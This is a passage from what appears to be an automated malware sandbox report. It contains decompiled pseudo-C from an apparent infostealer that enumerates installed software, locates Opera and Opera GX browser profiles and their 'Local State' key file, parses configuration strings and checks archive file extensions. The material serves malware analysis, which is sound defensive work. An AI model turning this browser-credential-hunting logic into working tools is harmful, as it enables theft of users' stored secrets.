                                                                                • Opcode Fuzzy Hash: 5e05d7e298b713f4d04a40a79522251ee664bf33a0ff97227a87ce56e219096f
                                                                                • Instruction Fuzzy Hash: AFF14F71D0525C9EDB24DBA5CD81BDDBBB8AF05308F1040AAE508B7291DA786F88CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
                                                                                			E004156FB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				long _t69;
                                                                                				long _t79;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                				void* _t131;
                                                                                				void* _t132;
                                                                                				void* _t133;
                                                                                
                                                                                				_t133 = __eflags;
                                                                                				_push(0xcf8);
                                                                                				E00421A14(E00436DE6, __ebx, __edi, __esi);
                                                                                				 *(_t131 - 0xc40) = 0;
                                                                                				 *((intOrPtr*)(_t131 - 0xc50)) =  *((intOrPtr*)(_t131 + 8));
                                                                                				 *((intOrPtr*)(_t131 - 0xc24)) = 0xf;
                                                                                				 *((intOrPtr*)(_t131 - 0xc28)) = 0;
                                                                                				 *((char*)(_t131 - 0xc38)) = 0;
                                                                                				E00403A16(_t131 - 0xc38, _t133, 0x43e028, 0);
                                                                                				_push(_t131 - 0xd04);
                                                                                				 *((intOrPtr*)(_t131 - 4)) = 1;
                                                                                				E0041687E(0, _t131 - 0xc38, __edi, 1, _t133);
                                                                                				E00402C34(_t131 - 0xc38, 1, 0);
                                                                                				 *((char*)(_t131 - 4)) = 4;
                                                                                				 *(_t131 - 0xc48) = 0;
                                                                                				 *(_t131 - 0xc44) = 0;
                                                                                				 *(_t131 - 0xc54) = 0;
                                                                                				 *(_t131 - 0xc58) = 0xf003f;
                                                                                				 *(_t131 - 0xc3c) = 0;
                                                                                				_t69 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019, _t131 - 0xc48);
                                                                                				_t134 = _t69;
                                                                                				if(_t69 == 0) {
                                                                                					 *(_t131 - 0xc4c) = 0;
                                                                                					while(1) {
                                                                                						__eflags =  *(_t131 - 0xc54);
                                                                                						if(__eflags != 0) {
                                                                                							break;
                                                                                						}
                                                                                						 *(_t131 - 0xc3c) = 0x400;
                                                                                						_t79 = RegEnumKeyExA( *(_t131 - 0xc48),  *(_t131 - 0xc4c), _t131 - 0x81c, _t131 - 0xc3c, 0, 0, 0, 0);
                                                                                						 *(_t131 - 0xc54) = _t79;
                                                                                						__eflags = _t79;
                                                                                						if(_t79 != 0) {
                                                                                							L11:
                                                                                							 *(_t131 - 0xc4c) =  *(_t131 - 0xc4c) + 1;
                                                                                							continue;
                                                                                						}
                                                                                						wsprintfA(_t131 - 0xc1c, "%s\\%s", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", _t131 - 0x81c);
                                                                                						_t132 = _t132 + 0x10;
                                                                                						__eflags = RegOpenKeyExA(0x80000002, _t131 - 0xc1c, 0, 0x20019, _t131 - 0xc44);
                                                                                						if(__eflags == 0) {
                                                                                							 *(_t131 - 0xc3c) = 0x400;
                                                                                							__eflags = RegQueryValueExA( *(_t131 - 0xc44), "DisplayName", 0, _t131 - 0xc58, _t131 - 0x41c, _t131 - 0xc3c);
                                                                                							if(__eflags == 0) {
                                                                                								_push(_t131 - 0x41c);
                                                                                								_push(_t131 - 0xcf4);
                                                                                								E00416DEA(0, 0x80000002, 0x20019, __eflags);
                                                                                								 *(_t131 - 0xc3c) = 0x400;
                                                                                								__eflags = RegQueryValueExA( *(_t131 - 0xc44), "DisplayVersion", 0, _t131 - 0xc58, _t131 - 0x41c, _t131 - 0xc3c);
                                                                                								if(__eflags == 0) {
                                                                                									_push(" [");
                                                                                									_push(_t131 - 0xcf4);
                                                                                									_t100 = E00416DEA(0, 0x80000002, 0x20019, __eflags);
                                                                                									_push(_t131 - 0x41c);
                                                                                									_push(_t100);
                                                                                									_t101 = E00416DEA(0, 0x80000002, 0x20019, __eflags);
                                                                                									_push("]");
                                                                                									_push(_t101);
                                                                                									E00415504(0, 0x80000002, _t131, E00416DEA(0, 0x80000002, 0x20019, __eflags));
                                                                                								}
                                                                                							}
                                                                                							RegCloseKey( *(_t131 - 0xc44));
                                                                                							goto L11;
                                                                                						}
                                                                                						RegCloseKey( *(_t131 - 0xc44));
                                                                                						RegCloseKey( *(_t131 - 0xc48));
                                                                                						L13:
                                                                                						_t126 =  *((intOrPtr*)(_t131 - 0xc50));
                                                                                						_push(_t131 - 0xd04);
                                                                                						E00416915(0,  *((intOrPtr*)(_t131 - 0xc50)), 0x20019, __eflags);
                                                                                						_t57 = _t131 - 0xc40;
                                                                                						 *_t57 =  *(_t131 - 0xc40) | 0x00000001;
                                                                                						__eflags =  *_t57;
                                                                                						L14:
                                                                                						 *((char*)(_t131 - 4)) = 0;
                                                                                						E0040B593(_t131 - 0xd04, 0, _t126);
                                                                                						return E00421A70(0, _t126, 0x20019);
                                                                                					}
                                                                                					RegCloseKey( *(_t131 - 0xc48));
                                                                                					 *((intOrPtr*)(_t131 - 4)) = 3;
                                                                                					goto L13;
                                                                                				}
                                                                                				_t126 =  *((intOrPtr*)(_t131 - 0xc50));
                                                                                				_push(_t131 - 0xd04);
                                                                                				E00416915(0,  *((intOrPtr*)(_t131 - 0xc50)), 0x20019, _t134);
                                                                                				 *(_t131 - 0xc40) = 1;
                                                                                				goto L14;
                                                                                			}










                                                                                0x004156fb
                                                                                0x004156fb
                                                                                0x00415705
                                                                                0x0041570f
                                                                                0x00415721
                                                                                0x00415727
                                                                                0x00415731
                                                                                0x00415737
                                                                                0x0041573d
                                                                                0x0041574b
                                                                                0x00415752
                                                                                0x00415755
                                                                                0x00415762
                                                                                0x0041577a
                                                                                0x00415785
                                                                                0x0041578b
                                                                                0x00415791
                                                                                0x00415797
                                                                                0x004157a1
                                                                                0x004157a7
                                                                                0x004157ad
                                                                                0x004157af
                                                                                0x004157d2
                                                                                0x004157d8
                                                                                0x004157d8
                                                                                0x004157de
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004157fc
                                                                                0x0041580c
                                                                                0x00415812
                                                                                0x00415818
                                                                                0x0041581a
                                                                                0x0041593f
                                                                                0x0041593f
                                                                                0x00000000
                                                                                0x0041593f
                                                                                0x00415839
                                                                                0x0041583f
                                                                                0x00415859
                                                                                0x0041585b
                                                                                0x0041589b
                                                                                0x004158ab
                                                                                0x004158ad
                                                                                0x004158b9
                                                                                0x004158c0
                                                                                0x004158c1
                                                                                0x004158e9
                                                                                0x004158f9
                                                                                0x004158fb
                                                                                0x00415903
                                                                                0x00415908
                                                                                0x00415909
                                                                                0x00415916
                                                                                0x00415917
                                                                                0x00415918
                                                                                0x0041591f
                                                                                0x00415924
                                                                                0x0041592d
                                                                                0x00415932
                                                                                0x004158fb
                                                                                0x00415939
                                                                                0x00000000
                                                                                0x00415939
                                                                                0x00415863
                                                                                0x0041586f
                                                                                0x0041596e
                                                                                0x0041596e
                                                                                0x0041597a
                                                                                0x0041597b
                                                                                0x00415980
                                                                                0x00415980
                                                                                0x00415980
                                                                                0x00415987
                                                                                0x0041598d
                                                                                0x00415990
                                                                                0x0041599c
                                                                                0x0041599c
                                                                                0x00415950
                                                                                0x00415956
                                                                                0x00000000
                                                                                0x00415956
                                                                                0x004157b1
                                                                                0x004157bd
                                                                                0x004157be
                                                                                0x004157c3
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00415705
                                                                                  • Part of subcall function 0041687E: __EH_prolog3.LIBCMT ref: 00416885
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000001,00000000,?), ref: 004157A7
                                                                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000), ref: 0041580C
                                                                                • wsprintfA.USER32 ref: 00415839
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,0040B529,?,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 00415853
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 00415863
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0041586F
                                                                                  • Part of subcall function 00416915: __EH_prolog3_GS.LIBCMT ref: 0041691C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen$EnumH_prolog3H_prolog3_H_prolog3_catch__memmovewsprintf
                                                                                • String ID: %s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 1626441260-3437733507
                                                                                • Opcode ID: 74ba69e5efe333a53b706f35157785c4d0df42311a90a4e3878e7611e4b5dc2d
                                                                                • Instruction ID: 15cbd451e1a085848f5e9e7532ebf4a77cd73ce1decbcd6b2afacde998f3abde
                                                                                • Opcode Fuzzy Hash: 74ba69e5efe333a53b706f35157785c4d0df42311a90a4e3878e7611e4b5dc2d
                                                                                • Instruction Fuzzy Hash: B36107B584012CEAEB299F55CD85EDEB7B8FB04314F1042EAE109A2151DF389FC98F19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E004139E8(void* __ebx, char* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t92;
                                                                                				WCHAR* _t98;
                                                                                				signed char _t99;
                                                                                				void* _t111;
                                                                                				void* _t116;
                                                                                				void* _t117;
                                                                                				intOrPtr _t118;
                                                                                				char* _t125;
                                                                                				char* _t127;
                                                                                				void* _t134;
                                                                                				void* _t140;
                                                                                				void* _t141;
                                                                                				void* _t143;
                                                                                				void* _t144;
                                                                                
                                                                                				_t125 = __edx;
                                                                                				E004219DE(E004372D8, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t140 - 0x374)) =  *((intOrPtr*)(_t140 + 8));
                                                                                				 *((intOrPtr*)(_t140 - 0x378)) =  *((intOrPtr*)(_t140 + 0xc));
                                                                                				 *((intOrPtr*)(_t140 - 0x364)) =  *((intOrPtr*)(_t140 + 0x10));
                                                                                				 *((intOrPtr*)(_t140 - 0x370)) = 0;
                                                                                				 *((intOrPtr*)(_t140 - 0x368)) = 0;
                                                                                				E00427E30(_t140 - 0x220, 0, 0x104);
                                                                                				E00427E30(_t140 - 0x328, 0, 0x104);
                                                                                				_t143 = _t141 + 0x18;
                                                                                				_t116 = 0x1a;
                                                                                				E00417B4D(_t116);
                                                                                				_t127 = "\\Opera Software\\";
                                                                                				 *0x44a1b8(_t140 - 0x220, _t127, _t140 - 0x220, 0x370);
                                                                                				 *0x44a1b8(_t140 - 0x220,  *((intOrPtr*)(_t140 - 0x364)));
                                                                                				_push("\\Opera Stable\\");
                                                                                				_push( *((intOrPtr*)(_t140 - 0x364)));
                                                                                				 *((intOrPtr*)(_t140 - 0x36c)) = 0;
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					 *((intOrPtr*)(_t140 - 0x36c)) = 1;
                                                                                				}
                                                                                				_push("\\Opera GX Stable\\");
                                                                                				_push( *((intOrPtr*)(_t140 - 0x364)));
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					 *((intOrPtr*)(_t140 - 0x36c)) = 2;
                                                                                				}
                                                                                				_t117 = 0x1a;
                                                                                				E00417B4D(_t117);
                                                                                				 *0x44a1b8(_t140 - 0x328, _t127, _t140 - 0x328);
                                                                                				E00427E30(_t140 - 0x118, 0, 0x104);
                                                                                				_t144 = _t143 + 0xc;
                                                                                				 *0x44a1b8(_t140 - 0x118, _t140 - 0x220);
                                                                                				 *0x44a1b8(_t140 - 0x118, "\\Local State");
                                                                                				_t92 = _t140 - 0x118;
                                                                                				 *((intOrPtr*)(_t140 - 0x330)) = 0xf;
                                                                                				 *((intOrPtr*)(_t140 - 0x334)) = 0;
                                                                                				 *((char*)(_t140 - 0x344)) = 0;
                                                                                				_t134 = _t92 + 1;
                                                                                				do {
                                                                                					_t118 =  *_t92;
                                                                                					_t92 = _t92 + 1;
                                                                                					_t149 = _t118;
                                                                                				} while (_t118 != 0);
                                                                                				E00403A16(_t140 - 0x344, _t149, _t140 - 0x118, _t92 - _t134);
                                                                                				 *(_t140 - 4) = 0;
                                                                                				_t98 = E004175C4(_t140 - 0x344, _t140 - 0x360);
                                                                                				if(_t98[0xa] >= 8) {
                                                                                					_t98 =  *_t98;
                                                                                				}
                                                                                				_t99 = GetFileAttributesW(_t98);
                                                                                				if(_t99 == 0xffffffff) {
                                                                                					L10:
                                                                                					 *((intOrPtr*)(_t140 - 0x364)) = 0;
                                                                                					goto L11;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(_t140 - 0x364)) = 1;
                                                                                					if((_t99 & 0x00000010) == 0) {
                                                                                						L11:
                                                                                						_t135 = _t140 - 0x360;
                                                                                						E00403960(0, _t140 - 0x360, 1);
                                                                                						 *(_t140 - 4) =  *(_t140 - 4) | 0xffffffff;
                                                                                						E00402C34(_t140 - 0x344, 1, 0);
                                                                                						_t153 =  *((intOrPtr*)(_t140 - 0x364));
                                                                                						if( *((intOrPtr*)(_t140 - 0x364)) != 0) {
                                                                                							_push(_t140 - 0x368);
                                                                                							_push(_t140 - 0x118);
                                                                                							_t111 = E0040F7A2(0, _t140 - 0x370, 0, _t135, _t153);
                                                                                							_t154 = _t111;
                                                                                							if(_t111 == 0) {
                                                                                								E0040F708(_t140 - 0x370, _t140 - 0x368);
                                                                                							}
                                                                                						}
                                                                                						_t136 =  *((intOrPtr*)(_t140 - 0x374));
                                                                                						E00410EAE( *((intOrPtr*)(_t140 - 0x374)), _t125, 0x43e028, _t140 - 0x220,  *((intOrPtr*)(_t140 - 0x378)),  *((intOrPtr*)(_t140 - 0x370)),  *((intOrPtr*)(_t140 - 0x368)));
                                                                                						_push( *((intOrPtr*)(_t140 - 0x36c)));
                                                                                						_t145 = _t144 - 0x1c;
                                                                                						 *((intOrPtr*)(_t140 - 0x36c)) = _t144 - 0x1c;
                                                                                						E0040410F(_t145, _t136 + 8);
                                                                                						_push( *((intOrPtr*)(_t140 - 0x378)));
                                                                                						E00413046(_t140 - 0x328,  *((intOrPtr*)(_t140 - 0x374)),  *((intOrPtr*)(_t140 - 0x374)), _t145, _t154);
                                                                                						E0040F708(_t140 - 0x370, _t140 - 0x368);
                                                                                						return E00421A61(_t140 - 0x328, _t140 - 0x370, _t140 - 0x368);
                                                                                					}
                                                                                					goto L10;
                                                                                				}
                                                                                			}

















                                                                                0x004139e8
                                                                                0x004139f2
                                                                                0x004139fa
                                                                                0x00413a03
                                                                                0x00413a14
                                                                                0x00413a22
                                                                                0x00413a28
                                                                                0x00413a2e
                                                                                0x00413a3f
                                                                                0x00413a44
                                                                                0x00413a50
                                                                                0x00413a51
                                                                                0x00413a56
                                                                                0x00413a63
                                                                                0x00413a76
                                                                                0x00413a7c
                                                                                0x00413a81
                                                                                0x00413a87
                                                                                0x00413a95
                                                                                0x00413a97
                                                                                0x00413a97
                                                                                0x00413aa1
                                                                                0x00413aa6
                                                                                0x00413ab4
                                                                                0x00413ab6
                                                                                0x00413ab6
                                                                                0x00413ac9
                                                                                0x00413aca
                                                                                0x00413ad7
                                                                                0x00413ae6
                                                                                0x00413aeb
                                                                                0x00413afc
                                                                                0x00413b0e
                                                                                0x00413b14
                                                                                0x00413b1a
                                                                                0x00413b24
                                                                                0x00413b2a
                                                                                0x00413b30
                                                                                0x00413b33
                                                                                0x00413b33
                                                                                0x00413b35
                                                                                0x00413b36
                                                                                0x00413b36
                                                                                0x00413b4a
                                                                                0x00413b5c
                                                                                0x00413b5f
                                                                                0x00413b68
                                                                                0x00413b6a
                                                                                0x00413b6a
                                                                                0x00413b6d
                                                                                0x00413b76
                                                                                0x00413b86
                                                                                0x00413b86
                                                                                0x00000000
                                                                                0x00413b78
                                                                                0x00413b78
                                                                                0x00413b84
                                                                                0x00413b8c
                                                                                0x00413b90
                                                                                0x00413b96
                                                                                0x00413b9b
                                                                                0x00413ba8
                                                                                0x00413bad
                                                                                0x00413bb3
                                                                                0x00413bbb
                                                                                0x00413bc2
                                                                                0x00413bc9
                                                                                0x00413bd0
                                                                                0x00413bd2
                                                                                0x00413be0
                                                                                0x00413be0
                                                                                0x00413bd2
                                                                                0x00413beb
                                                                                0x00413c0b
                                                                                0x00413c10
                                                                                0x00413c19
                                                                                0x00413c1e
                                                                                0x00413c25
                                                                                0x00413c2a
                                                                                0x00413c3c
                                                                                0x00413c4d
                                                                                0x00413c57
                                                                                0x00413c57
                                                                                0x00000000
                                                                                0x00413b84

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004139F2
                                                                                • _memset.LIBCMT ref: 00413A2E
                                                                                • _memset.LIBCMT ref: 00413A3F
                                                                                  • Part of subcall function 00417B4D: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00413DBC,014A10F8,00413DBC,?,?,?,?,?,?,?), ref: 00417B63
                                                                                • lstrcat.KERNEL32(?,\Opera Software\), ref: 00413A63
                                                                                • lstrcat.KERNEL32(?,?), ref: 00413A76
                                                                                • StrCmpCA.SHLWAPI(?,\Opera Stable\,?,?,?,00414013,?,\Opera Stable\,?,?,?,?,00000000), ref: 00413A8D
                                                                                • StrCmpCA.SHLWAPI(?,\Opera GX Stable\,?,?,?,00414013,?,\Opera Stable\,?,?,?,?,00000000), ref: 00413AAC
                                                                                • lstrcat.KERNEL32(?,\Opera Software\), ref: 00413AD7
                                                                                • _memset.LIBCMT ref: 00413AE6
                                                                                • lstrcat.KERNEL32(?,?), ref: 00413AFC
                                                                                • lstrcat.KERNEL32(?,\Local State), ref: 00413B0E
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00413B6D
                                                                                  • Part of subcall function 00413046: __EH_prolog3.LIBCMT ref: 0041304D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$_memset$AttributesFileFolderH_prolog3H_prolog3_Path
                                                                                • String ID: \Local State$\Opera GX Stable\$\Opera Software\$\Opera Stable\
                                                                                • API String ID: 2266200472-3706290991
                                                                                • Opcode ID: 57e0b6db6846a2362512121cfd9c52a056200afcee029d1c98b7a0d41764ad48
                                                                                • Instruction ID: 47b8a02ea4a113b847b1a700a10ac577532edc2169a5fc858bead9af8b93c494
                                                                                • Opcode Fuzzy Hash: 57e0b6db6846a2362512121cfd9c52a056200afcee029d1c98b7a0d41764ad48
                                                                                • Instruction Fuzzy Hash: 8F6139B1D0422CABDB229F64DC85BDAB7BCBF08714F0041EAA519A3151DA75AFC4CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 65%
                                                                                			E00409D7B(void* __edx, void* __eflags, char _a4) {
                                                                                				signed int _v12;
                                                                                				char _v5016;
                                                                                				char _v55016;
                                                                                				char _v60016;
                                                                                				char _v75016;
                                                                                				char _v90016;
                                                                                				intOrPtr _v90020;
                                                                                				char _v90024;
                                                                                				char _v90028;
                                                                                				intOrPtr _v90032;
                                                                                				intOrPtr _v90036;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t43;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t62;
                                                                                				char* _t65;
                                                                                				intOrPtr _t68;
                                                                                				intOrPtr _t71;
                                                                                				intOrPtr _t74;
                                                                                				intOrPtr _t76;
                                                                                				signed int _t77;
                                                                                				void* _t94;
                                                                                				signed int _t97;
                                                                                				void* _t98;
                                                                                				void* _t103;
                                                                                
                                                                                				_t94 = __edx;
                                                                                				E00430D40(0x15fb0);
                                                                                				_t43 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t43 ^ _t97;
                                                                                				_v90024 = _a4;
                                                                                				E00427E30( &_v55016, 0, 0xc350);
                                                                                				E00427E30( &_v60016, 0, 0x1388);
                                                                                				E00427E30( &_v5016, 0, 0x1388);
                                                                                				E00427E30( &_v90016, 0, 0x3a98);
                                                                                				E00427E30( &_v75016, 0, 0x3a98);
                                                                                				_t103 = _t98 + 0x3c;
                                                                                				 *0x44a1b8( &_v55016, _v90024);
                                                                                				_t60 = E0041F145(0, _t94, 0x1388,  &_v55016, ";",  &_v90028);
                                                                                				_v90024 = 1;
                                                                                				while(1) {
                                                                                					_t103 = _t103 + 0xc;
                                                                                					_v90020 = _t60;
                                                                                					if(_t60 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t62 = _v90024 - 1;
                                                                                					__eflags = _t62;
                                                                                					if(_t62 == 0) {
                                                                                						E00427E30( &_v60016, 0, 0x1388);
                                                                                						_t65 =  &_v60016;
                                                                                						L13:
                                                                                						_t103 = _t103 + 0xc;
                                                                                						 *0x44a1b8(_t65, _v90020);
                                                                                						L14:
                                                                                						_t36 =  &_v90024;
                                                                                						 *_t36 = _v90024 + 1;
                                                                                						__eflags =  *_t36;
                                                                                						_t60 = E0041F145(0, _t94, 0x1388, 0, ";",  &_v90028);
                                                                                						continue;
                                                                                					}
                                                                                					_t68 = _t62 - 1;
                                                                                					__eflags = _t68;
                                                                                					if(_t68 == 0) {
                                                                                						E00427E30( &_v5016, 0, 0x1388);
                                                                                						_t65 =  &_v5016;
                                                                                						goto L13;
                                                                                					}
                                                                                					_t71 = _t68 - 1;
                                                                                					__eflags = _t71;
                                                                                					if(_t71 == 0) {
                                                                                						E00427E30( &_v90016, 0, 0x3a98);
                                                                                						_t65 =  &_v90016;
                                                                                						goto L13;
                                                                                					} else {
                                                                                						_t74 = _t71 - 1;
                                                                                						__eflags = _t74;
                                                                                						if(_t74 == 0) {
                                                                                							_push(_v90020);
                                                                                							_v90036 = E0041F2F3();
                                                                                						} else {
                                                                                							_t76 = _t74 - 1;
                                                                                							__eflags = _t76;
                                                                                							if(_t76 == 0) {
                                                                                								_t77 =  *0x44a1d8(_v90020, "true");
                                                                                								asm("sbb eax, eax");
                                                                                								_v90032 =  ~_t77 + 1;
                                                                                							} else {
                                                                                								__eflags = _t76 == 1;
                                                                                								if(_t76 == 1) {
                                                                                									E00427E30( &_v75016, 0, 0x3a98);
                                                                                									 *0x44a1b8( &_v75016, _v90020);
                                                                                									E004099F2( &_v60016, _t94, __eflags, _v90036,  &_v5016,  &_v90016, _v90032, _v90020);
                                                                                									_t103 = _t103 + 0x20;
                                                                                									_v90024 = 0;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                				}
                                                                                				return E0041DEB4(_t60, 0, _v12 ^ _t97, _t94, 0x1388, 0x3a98);
                                                                                			}






























                                                                                0x00409d7b
                                                                                0x00409d83
                                                                                0x00409d88
                                                                                0x00409d8f
                                                                                0x00409d9d
                                                                                0x00409dad
                                                                                0x00409dc3
                                                                                0x00409dd4
                                                                                0x00409dea
                                                                                0x00409dfb
                                                                                0x00409e00
                                                                                0x00409e10
                                                                                0x00409e29
                                                                                0x00409e2e
                                                                                0x00409f60
                                                                                0x00409f60
                                                                                0x00409f63
                                                                                0x00409f6b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409e43
                                                                                0x00409e43
                                                                                0x00409e44
                                                                                0x00409f2d
                                                                                0x00409f32
                                                                                0x00409f38
                                                                                0x00409f38
                                                                                0x00409f42
                                                                                0x00409f48
                                                                                0x00409f48
                                                                                0x00409f48
                                                                                0x00409f48
                                                                                0x00409f5b
                                                                                0x00000000
                                                                                0x00409f5b
                                                                                0x00409e4a
                                                                                0x00409e4a
                                                                                0x00409e4b
                                                                                0x00409f17
                                                                                0x00409f1c
                                                                                0x00000000
                                                                                0x00409f1c
                                                                                0x00409e51
                                                                                0x00409e51
                                                                                0x00409e52
                                                                                0x00409f01
                                                                                0x00409f06
                                                                                0x00000000
                                                                                0x00409e58
                                                                                0x00409e58
                                                                                0x00409e58
                                                                                0x00409e59
                                                                                0x00409ee4
                                                                                0x00409ef0
                                                                                0x00409e5f
                                                                                0x00409e5f
                                                                                0x00409e5f
                                                                                0x00409e60
                                                                                0x00409ed1
                                                                                0x00409ed9
                                                                                0x00409edc
                                                                                0x00409e62
                                                                                0x00409e62
                                                                                0x00409e63
                                                                                0x00409e72
                                                                                0x00409e87
                                                                                0x00409eb3
                                                                                0x00409eb8
                                                                                0x00409ebb
                                                                                0x00409ebb
                                                                                0x00409e63
                                                                                0x00409e60
                                                                                0x00000000
                                                                                0x00409e59
                                                                                0x00409e52
                                                                                0x00409f7f

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$_strtok_slstrcat
                                                                                • String ID: true
                                                                                • API String ID: 3121452665-4261170317
                                                                                • Opcode ID: 010495f5d40d47203e122d1f4fb58f1cc23d2e6d5d86598d96ebf1b64298457c
                                                                                • Instruction ID: eb98f98bd5ec430971a32dc915a3c209b48caa516c0126fac566ab52d8cbfe18
                                                                                • Opcode Fuzzy Hash: 010495f5d40d47203e122d1f4fb58f1cc23d2e6d5d86598d96ebf1b64298457c
                                                                                • Instruction Fuzzy Hash: DB513CB2D1052DEECF209B60EC85CDAB77DAB55349B4004FAB10DEA141D6389F868F65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,00000000,0041CC5C,?,00440C98,?,00000000), ref: 0041C061
                                                                                • StrCmpCA.SHLWAPI(00000000,00442A80), ref: 0041C089
                                                                                • StrCmpCA.SHLWAPI(00000000,.zip), ref: 0041C09D
                                                                                • StrCmpCA.SHLWAPI(00000000,.zoo), ref: 0041C0AD
                                                                                • StrCmpCA.SHLWAPI(00000000,.arc), ref: 0041C0BD
                                                                                • StrCmpCA.SHLWAPI(00000000,.lzh), ref: 0041C0CD
                                                                                • StrCmpCA.SHLWAPI(00000000,.arj), ref: 0041C0DD
                                                                                • StrCmpCA.SHLWAPI(00000000,.gz), ref: 0041C0ED
                                                                                • StrCmpCA.SHLWAPI(00000000,.tgz), ref: 0041C0FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                • API String ID: 1659193697-51310709
                                                                                • Opcode ID: 6cd89107c9b25a76d121727b03043ab714471eed10fed4fe3570d2c52fbef4ad
                                                                                • Instruction ID: f3f8eadf38d2d01ace3f20948d054dfb57502fe24134cf8a390a1adf9d844e14
                                                                                • Opcode Fuzzy Hash: 6cd89107c9b25a76d121727b03043ab714471eed10fed4fe3570d2c52fbef4ad
                                                                                • Instruction Fuzzy Hash: 871165347C0B21A6AB311B75BC89FDB3F545F07F417184026FC49A1190D79C95C2A6AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 48%
                                                                                			E0040E67C(char* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t35;
                                                                                				int _t38;
                                                                                				char* _t61;
                                                                                				void* _t62;
                                                                                				void* _t67;
